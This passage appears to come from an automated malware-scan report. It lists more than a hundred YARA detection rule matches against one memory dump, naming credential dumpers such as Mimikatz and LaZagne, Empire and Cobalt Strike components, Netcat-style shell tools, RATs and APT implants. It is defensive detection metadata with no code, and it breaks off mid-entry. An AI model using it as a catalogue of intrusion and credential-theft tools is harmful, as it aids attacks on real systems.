Invoke-RelfectivePEInjection.ps1, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: ps1_toolkit_Inveigh_BruteForce_2, Description: Auto-generated rule - from files Inveigh-BruteForce.ps1, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: ps1_toolkit_Persistence_2, Description: Auto-generated rule - from files Persistence.ps1, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: ps1_toolkit_Inveigh_BruteForce_3, Description: Auto-generated rule - from files Inveigh-BruteForce.ps1, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Casper_Included_Strings, Description: Casper French Espionage Malware - String Match in File - http://goo.gl/VRJNLo, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Casper_SystemInformation_Output, Description: Casper French Espionage Malware - System Info Output - http://goo.gl/VRJNLo, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Backdoor_Redosdru_Jun17, Description: Detects malware Redosdru - file systemHome.exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: IronGate_APT_Step7ProSim_Gen, Description: Detects IronGate APT Malware - Step7ProSim DLL, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: ZxShell_Jul17, Description: Detects a ZxShell - CN threat group, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: DeepPanda_lot1, Description: Hack Deep Panda - lot1.tmp-pwdump, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: DeepPanda_htran_exe, Description: Hack Deep Panda - htran-exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EternalRocks_taskhost, Description: Detects EternalRocks Malware - file taskhost.exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Amplia_Security_Tool, Description: Amplia Security Tool, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: unknown Rule: PwDump, Description: PwDump 6 variant, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Marc Stroebel Rule: HackTool_Samples, Description: Hacktool, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: unknown Rule: Fierce2, Description: This signature detects the Fierce2 domain scanner, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Ncrack, Description: This signature detects the Ncrack brute force tool, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: SQLMap, Description: This signature detects the SQLMap SQL injection tool, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: PortScanner, Description: Auto-generated rule on file PortScanner.exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: yarGen Yara Rule Generator by Florian Roth Rule: NetBIOS_Name_Scanner, Description: Auto-generated rule on file NetBIOS Name Scanner.exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: yarGen Yara Rule Generator by Florian Roth Rule: FeliksPack3___Scanners_ipscan, Description: Auto-generated rule on file ipscan.exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: yarGen Yara Rule Generator by Florian Roth Rule: IP_Stealing_Utilities, Description: Auto-generated rule on file IP Stealing Utilities.exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: yarGen Yara Rule Generator by Florian Roth Rule: PortRacer, Description: Auto-generated rule on file PortRacer.exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: yarGen Yara Rule Generator by Florian Roth Rule: scanarator, Description: Auto-generated rule on file scanarator.exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: yarGen Yara Rule Generator by Florian Roth Rule: Powershell_Netcat, Description: Detects a Powershell version of the Netcat network hacking tool, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Hacktools_CN_Burst_pass, Description: Disclosed hacktool set - file pass.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Hacktools_CN_Burst_Start, Description: Disclosed hacktool set - file Start.bat - DoS tool, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Hacktools_CN_Burst_Blast, Description: Disclosed hacktool set - file Blast.bat, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EditKeyLogReadMe, Description: Disclosed hacktool set (old stuff) - file EditKeyLogReadMe.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: PassSniffer_zip_Folder_readme, Description: Disclosed hacktool set (old stuff) - file readme.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Jc_WinEggDrop_Shell, Description: Disclosed hacktool set (old stuff) - file Jc.WinEggDrop Shell.txt, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: LinuxHacktool_eyes_a, Description: Linux hack tools - file a, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: CN_Toolset_sig_1433_135_sqlr, Description: Detects a Chinese hacktool from a disclosed toolset - file sqlr.exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: VSSown_VBS, Description: Detects VSSown.vbs script - used to export shadow copy elements like NTDS to take away and crack elsewhere, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Linux_Portscan_Shark_2, Description: Detects Linux Port Scanner Shark, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: WCE_in_memory, Description: Detects Windows Credential Editor (WCE) in memory (and also on disk), Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: pstgdump, Description: Detects a tool used by APT groups - file pstgdump.exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: lsremora, Description: Detects a tool used by APT groups, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: cachedump, Description: Detects a tool used by APT groups - from files cachedump.exe, cachedump64.exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: PwDump_B, Description: Detects a tool used by APT groups - file PwDump.exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: MSBuild_Mimikatz_Execution_via_XML, Description: Detects an XML that executes Mimikatz on an endpoint via MSBuild, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Disclosed_0day_POCs_injector, Description: Detects POC code from disclosed 0day hacktool set, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: ProcessInjector_Gen, Description: Detects a process injection utility that can be used ofr good and bad purposes, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Lazagne_PW_Dumper, Description: Detects Lazagne PW Dumper, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Markus Neis / Florian Roth Rule: SUSP_shellpop_Bash, Description: Detects susupicious bash command, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Tobias Michalski Rule: HKTL_Lazagne_Gen_18, Description: Detects Lazagne password extractor hacktool, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: HKTL_NoPowerShell, Description: Detects NoPowerShell hack tool, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: HKTL_LNX_Pnscan, Description: Detects Pnscan port scanner, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: APT_PupyRAT_PY, Description: Detects Pupy RAT, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Suspicious_Script_Running_from_HTTP, Description: Detects a suspicious , Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: SUSP_Netsh_PortProxy_Command, Description: Detects a suspicious command line with netsh and the portproxy command, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_1, Description: Detetcs the Nanocore RAT and similar malware, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: APT_Turla_Agent_BTZ_Gen_1, Description: Detects Turla Agent.BTZ, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: APT_Malware_CommentCrew_MiniASP, Description: CommentCrew Malware MiniASP APT, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: IMPLANT_3_v1, Description: X-Agent/CHOPSTICK Implant by APT28, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: US CERT Rule: Industroyer_Portscan_3_Output, Description: Detects Industroyer related custom port scaner output file, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Industroyer_Malware_5, Description: Detects Industroyer related malware, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Unit78020_Malware_Gen1, Description: Detects malware by Chinese APT PLA Unit 78020 - Generic Rule, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Unit78020_Malware_Gen3, Description: Detects malware by Chinese APT PLA Unit 78020 - Generic Rule - Chong, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: MAL_HawkEye_Keylogger_Gen_Dec18, Description: Detects HawkEye Keylogger Reborn, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: WindowsShell_s3, Description: Detects simple Windows shell - file s3.exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: WindosShell_s1, Description: Detects simple Windows shell - file s1.exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: WindowsShell_Gen, Description: Detects simple Windows shell - from files keygen.exe, s1.exe, s2.exe, s3.exe, s4.exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: WindowsShell_Gen2, Description: Detects simple Windows shell - from files s3.exe, s4.exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: PassCV_Sabre_Malware_2, Description: PassCV Malware mentioned in Cylance Report, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Turla_APT_Malware_Gen1, Description: Detects Turla malware (based on sample used in the RUAG APT case), Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Turla_APT_Malware_Gen2, Description: Detects Turla malware (based on sample used in the RUAG APT case), Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Turla_APT_Malware_Gen3, Description: Detects Turla malware (based on sample used in the RUAG APT case), Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: redSails_PY, Description: Detects Red Sails Hacktool - Python, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: APT_Malware_PutterPanda_Rel, Description: Detects an APT malware related to PutterPanda, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Rehashed_RAT_2, Description: Detects malware from Rehashed RAT incident, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Malware_QA_vqgk, Description: VT Research QA uploaded malware - file vqgk.dll, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Pupy_Backdoor, Description: Detects Pupy backdoor, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: IronPanda_DNSTunClient, Description: Iron Panda malware DnsTunClient - file named.exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: IronPanda_Malware_Htran, Description: Iron Panda Malware Htran, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: PP_CN_APT_ZeroT_3, Description: Detects malware from the Proofpoint CN APT ZeroT incident, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: PP_CN_APT_ZeroT_5, Description: Detects malware from the Proofpoint CN APT ZeroT incident, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: CN_APT_ZeroT_extracted_Mcutil, Description: Chinese APT by Proofpoint ZeroT RAT - file Mcutil.dll, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Microcin_Sample_5, Description: Malware sample mentioned in Microcin technical report by Kaspersky, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: clearlog, Description: Detects Fireball malware - file clearlog.dll, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: PS_AMSI_Bypass, Description: Detects PowerShell AMSI Bypass, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: JS_Suspicious_MSHTA_Bypass, Description: Detects MSHTA Bypass, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: JavaScript_Run_Suspicious, Description: Detects a suspicious Javascript Run command, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: FVEY_ShadowBroker_Auct_Dez16_Strings, Description: String from the ShodowBroker Files Screenshots - Dec 2016, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Ysoserial_Payload_Spring1, Description: Ysoserial Payloads - file Spring1.bin, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Ysoserial_Payload, Description: Ysoserial Payloads, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Ysoserial_Payload_3, Description: Ysoserial Payloads - from files JavassistWeld1.bin, JBossInterceptors.bin, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Mimikatz_Memory_Rule_1, Description: Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Mimikatz_Memory_Rule_2, Description: Mimikatz Rule generated from a memory dump, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth - Florian Roth Rule: Mimikatz_Logfile, Description: Detects a log file generated by malicious hack tool mimikatz, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Mimikatz_Strings, Description: Detects Mimikatz strings, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: FiveEyes_QUERTY_Malwaresig_20123_cmdDef, Description: FiveEyes QUERTY Malware - file 20123_cmdDef.xml, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: FiveEyes_QUERTY_Malwareqwerty_20123, Description: FiveEyes QUERTY Malware - file 20123.xml, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: FiveEyes_QUERTY_Malwaresig_20120_cmdDef, Description: FiveEyes QUERTY Malware - file 20120_cmdDef.xml, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: FiveEyes_QUERTY_Malwaresig_20121_cmdDef, Description: FiveEyes QUERTY Malware - file 20121_cmdDef.xml, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: VUL_JQuery_FileUpload_CVE_2018_9206, Description: Detects JQuery File Upload vulnerability CVE-2018-9206, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: CACTUSTORCH, Description: Detects CactusTorch Hacktool, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: APT_FIN7_Strings_Aug18_1, Description: Detects strings from FIN7 report in August 2018, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Quasar_RAT_2, Description: Detects Quasar RAT, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: OPCLEAVER_CCProxy_Config, Description: CCProxy config known from Operation Cleaver, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: OpCloudHopper_Malware_5, Description: Detects malware from Operation Cloud Hopper, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: OpCloudHopper_WmiDLL_inMemory, Description: Malware related to Operation Cloud Hopper - Page 25, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: VBS_WMIExec_Tool_Apr17_1, Description: Tools related to Operation Cloud Hopper, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Regin_Related_Malware, Description: Malware Sample - maybe Regin related, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationDrug_HDDSSD_Op, Description: EquationDrug - HDD/SSD firmware operation - nls_933w.dll, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth @4nc4p Rule: RevengeRAT_Sep17, Description: Detects RevengeRAT malware, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Empire_Invoke_Mimikatz, Description: Empire - a pure PowerShell post-exploitation agent - file Invoke-Mimikatz.ps1, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Mimipenguin_SH, Description: Detects Mimipenguin Password Extractor - Linux, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: HKTL_PowerKatz_Feb19_1, Description: Detetcs a tool used in the Australian Parliament House network compromise, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: HKTL_Unknown_Feb19_1, Description: Detetcs a tool used in the Australian Parliament House network compromise, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: POSHSPY_Malware, Description: Detects, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Pirpi_1609_A, Description: Detects Pirpi Backdoor - and other malware (generic rule), Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Pirpi_1609_B, Description: Detects Pirpi Backdoor, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: FourElementSword_Config_File, Description: Detects FourElementSword Malware, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: FourElementSword_ElevateDLL_2, Description: Detects FourElementSword Malware, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Win_PrivEsc_gp3finder_v4_0, Description: Detects a tool that can be used for privilege escalation - file gp3finder_v4.0.exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Win_PrivEsc_folderperm, Description: Detects a tool that can be used for privilege escalation - file folderperm.ps1, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: PoisonIvy_Sample_6, Description: Detects PoisonIvy RAT sample set, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: yara@s3c.za.net Rule: Metasploit_Loader_RSMudge, Description: Detects a Metasploit Loader by RSMudge - file loader.exe, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Armitage_OSX, Description: Detects Armitage component, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: OilRig_Malware_Campaign_Gen2, Description: Detects malware from OilRig Campaign, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: APT_APT34_PS_Malware_Apr19_1, Description: Detects APT34 PowerShell malware, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: APT_APT34_PS_Malware_Apr19_3, Description: Detects APT34 PowerShell malware, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Silence_malware_2, Description: Detects malware sample mentioned in the Silence report on Securelist, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Invoke_Mimikatz, Description: Detects Invoke-Mimikatz String, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: NTLM_Dump_Output, Description: NTML Hash Dump output file - John/LC format, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: FIN7_Backdoor_Aug17, Description: Detects Word Dropper from Proofpoint FIN7 Report, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Invoke_WMIExec_Gen_1, Description: Detects Invoke-WmiExec or Invoke-SmbExec, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: WMImplant, Description: Auto-generated rule - file WMImplant.ps1, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Invoke_PSImage, Description: Detects a command to execute PowerShell from String, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: HKTL_Dsniff, Description: Detects Dsniff hack tool, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: APT_Project_Sauron_arping_module, Description: Detects strings from arping module - Project Sauron report by Kaspersky, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: APT_Project_Sauron_kblogi_module, Description: Detects strings from kblogi module - Project Sauron report by Kaspersky, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: APT_Project_Sauron_basex_module, Description: Detects strings from basex module - Project Sauron report by Kaspersky, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: APT_Project_Sauron_dext_module, Description: Detects strings from dext module - Project Sauron report by Kaspersky, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: FVEY_ShadowBrokers_Jan17_Screen_Strings, Description: Detects strings derived from the ShadowBroker\'s leak of Windows tools/exploits, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: GRIZZLY_STEPPE_Malware_2, Description: Auto-generated rule, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Invoke_OSiRis, Description: Osiris Device Guard Bypass - file Invoke-OSiRis.ps1, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Sofacy_Fybis_ELF_Backdoor_Gen1, Description: Detects Sofacy Fysbis Linux Backdoor, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Greenbug_Malware_4, Description: Detects ISMDoor Backdoor, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Greenbug_Malware_5, Description: Auto-generated rule, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Winnti_NlaifSvc, Description: Winnti sample - file NlaifSvc.dll, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Empire_Get_SecurityPackages, Description: Detects Empire component - file Get-SecurityPackages.ps1, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Empire_Invoke_PowerDump, Description: Detects Empire component - file Invoke-PowerDump.ps1, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Empire_Invoke_ShellcodeMSIL, Description: Detects Empire component - file Invoke-ShellcodeMSIL.ps1, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Empire_Invoke_SmbScanner, Description: Detects Empire component - file Invoke-SmbScanner.ps1, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Empire_Invoke_EgressCheck, Description: Detects Empire component - file Invoke-EgressCheck.ps1, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Empire_Invoke_PostExfil, Description: Detects Empire component - file Invoke-PostExfil.ps1, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Empire_Invoke_SMBAutoBrute, Description: Detects Empire component - file Invoke-SMBAutoBrute.ps1, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Empire_Get_Keystrokes, Description: Detects Empire component - file Get-Keystrokes.ps1, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Empire_Invoke_DllInjection, Description: Detects Empire component - file Invoke-DllInjection.ps1, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Empire_KeePassConfig, Description: Detects Empire component - file KeePassConfig.ps1, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Empire_PowerUp_Gen, Description: Detects Empire component - from files PowerUp.ps1, PowerUp.ps1, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Empire_KeePassConfig_Gen, Description: Detects Empire component - from files KeePassConfig.ps1, KeePassConfig.ps1, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Empire_Invoke_Portscan_Gen, Description: Detects Empire component - from files Invoke-Portscan.ps1, Invoke-Portscan.ps1, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Empire_Invoke_Gen, Description: Detects Empire component - from files Invoke-DCSync.ps1, Invoke-PSInject.ps1, Invoke-ReflectivePEInjection.ps1, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: TeleBots_IntercepterNG, Description: Detects TeleBots malware - IntercepterNG, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: WiltedTulip_powershell, Description: Detects powershell script used in Operation Wilted Tulip, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: WiltedTulip_Windows_UM_Task, Description: Detects a Windows scheduled task as used in Operation Wilted Tulip, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: WiltedTulip_WindowsTask, Description: Detects hack tool used in Operation Wilted Tulip - Windows Tasks, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Impacket_Tools_Generic_1, Description: Compiled Impacket Tools, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: Invoke_mimikittenz, Description: Detects Mimikittenz - file Invoke-mimikittenz.ps1, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: ONHAT_Proxy_Hacktool, Description: Detects ONHAT Proxy - Htran like SOCKS hack tool used by Chinese APT groups, Source: 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_elgingamble, Description: Equation Group hack tool leaked by ShadowBrokers- file 